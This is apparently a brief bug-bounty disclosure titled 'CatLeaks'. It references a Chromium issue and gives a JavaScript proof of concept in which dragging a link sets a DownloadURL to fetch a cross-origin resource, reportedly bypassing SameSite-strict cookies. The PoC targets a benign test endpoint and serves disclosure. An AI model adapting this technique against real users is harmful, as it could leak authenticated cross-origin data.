CatLeaks (Awarded $1000)
Description YT
https://issuetracker.google.com/40060358 SameSite strict cookies bypass/cross-origin download via `e.dataTransfer.setData('DownloadURL', ...`
let link = document.createElement('a');
link.innerText = 'foo'
link.href = '#';
link.addEventListener('dragstart', onDragStart, false);
document.body.appendChild(link);
function onDragStart(e) {
e.dataTransfer.setData('DownloadURL', 'application/octet-stream:httpbin:https://httpbin.org/get');
e.dataTransfer.effectAllowed = 'all';
}
/20240924 - CatLeaks (Awarded $1000) - mqQjzx3HSUc.webp){kind=link}